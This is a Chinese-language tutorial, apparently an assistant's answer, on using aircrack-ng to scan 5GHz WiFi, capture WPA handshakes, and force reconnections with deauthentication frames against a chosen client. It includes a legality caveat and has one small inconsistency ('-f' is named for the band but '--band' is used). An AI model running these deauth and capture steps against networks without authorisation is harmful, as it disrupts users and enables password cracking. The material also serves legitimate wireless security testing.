使用 `aircrack-ng` 工具集来扫描 5GHz WiFi 网络的过程与扫描 2.4GHz 网络类似,但需要注意一些特定的配置和命令。以下是一个详细的步骤指南,帮助你在 5GHz 频段上扫描 WiFi 网络并捕获握手包。
### 前提条件
1. **操作系统**:通常在 Linux 系统上运行。
2. **硬件**:需要一个支持 5GHz 频段并能进入监听模式(Monitor Mode)的无线网卡。
3. **软件**:安装 `aircrack-ng` 工具集。可以在大多数 Linux 发行版中通过包管理器安装,如在 Ubuntu 上使用 `sudo apt-get install aircrack-ng`。
### 步骤
#### 1. 启动监听模式
首先,将无线网卡设置为监听模式,以便它可以捕获周围的无线信号。
```bash
airmon-ng start wlan0
```
这会创建一个新接口,通常是 `wlan0mon`,用于监听模式。
#### 2. 扫描 5GHz 网络
使用 `airodump-ng` 来扫描 5GHz 频段上的 WiFi 网络。5GHz 频段通常包括多个信道,范围从 36 到 165。你可以使用 `-f` 参数来指定扫描的频段。
```bash
airodump-ng --band a wlan0mon
```
这里的 `--band a` 参数指定扫描 5GHz 频段。
#### 3. 选择目标网络
观察输出,记下你想要捕获握手包的目标网络的 BSSID(基本服务集标识符)、信道(Channel)以及任何已连接的客户端 MAC 地址。
#### 4. 捕获握手包
一旦确定了目标网络,可以开始专门针对该网络捕获数据包。
```bash
airodump-ng --bssid [目标BSSID] -c [目标信道] -w [输出文件前缀] wlan0mon
```
这里,`--bssid` 参数指定目标网络的 BSSID,`-c` 参数指定目标网络所在的信道,`-w` 参数指定捕获文件的前缀名。
#### 5. 触发握手
如果长时间没有捕获到握手包,可能是因为没有客户端正在尝试连接到网络。可以通过向已连接的客户端发送断开连接(deauthentication)帧来促使握手发生。
```bash
aireplay-ng --deauth [次数] -a [目标BSSID] -c [客户端MAC地址] wlan0mon
```
`--deauth` 参数指定了发送断开连接帧的次数,`-a` 参数指定目标 AP 的 BSSID,`-c` 参数指定目标客户端的 MAC 地址。
#### 6. 验证握手包
一旦捕获到握手包,可以使用 `aircrack-ng` 来验证捕获文件中是否包含有效的握手包。
```bash
aircrack-ng [输出文件前缀]-01.cap
```
如果文件中包含有效的握手包,`aircrack-ng` 将显示相关信息。
### 注意事项
- **合法性**:确保你有权对目标网络进行这样的操作。未经授权的操作可能违法。
- **隐私**:尊重他人的隐私,不要非法获取或使用个人信息。
- **安全**:在公共或不安全的环境中使用这些工具时,注意保护自己的设备免受攻击。
- **硬件支持**:确保你的无线网卡支持 5GHz 频段并能进入监听模式。不是所有的无线网卡都支持这些功能。